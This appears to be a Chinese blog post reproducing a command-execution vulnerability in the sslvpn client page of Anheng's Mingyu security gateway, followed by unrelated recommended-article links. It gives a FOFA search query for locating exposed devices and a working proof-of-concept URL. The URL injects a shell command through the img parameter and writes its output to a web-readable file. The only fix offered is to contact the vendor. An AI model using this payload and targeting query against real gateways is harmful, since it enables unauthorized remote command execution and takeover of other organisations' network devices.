【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

Nx01 产品简介

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。

Nx02 漏洞描述

明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。

Nx03 产品主页

fofa-query: web.body="明御安全网关"

Nx04 漏洞复现

POC:

复制代码
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls

拼接URL/sslvpn/ceshi.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
东方隐侠安全团队-千里21 小时前
第13节 93年高能所被入侵,开启中国网络安全发展进程
网络·安全·web安全
kyle~21 小时前
计算机网络---传输层安全 SSL与TLS
计算机网络·安全·ssl
liebe1*121 小时前
第五章 防火墙设备互联
网络·防火墙
xixixi7777721 小时前
了解一下APM工具——就像给软件系统装的“全身CT”,能实时透视从用户点击到后端数据库的每个环节性能,精准定位哪里慢、为什么慢
数据库·安全·数据采集·apm·日志监控
q***99421 小时前
PON架构(全光网络)
网络·数据库·架构
belldeep21 小时前
网络安全:SQL 注入:SQLmap
web安全·sql注入·sqlmap
weixin_307779131 天前
基于最小权限原则的云计算Amazon VPC多层应用安全架构设计
网络·安全·云原生·云计算·aws
❥ღ Komo·1 天前
Ansible Playbook入门指南:核心语法与实战
网络
P***25391 天前
免费的Web安全漏洞扫描,工具
安全·web安全
Σdoughty1 天前
DNS主从服务
网络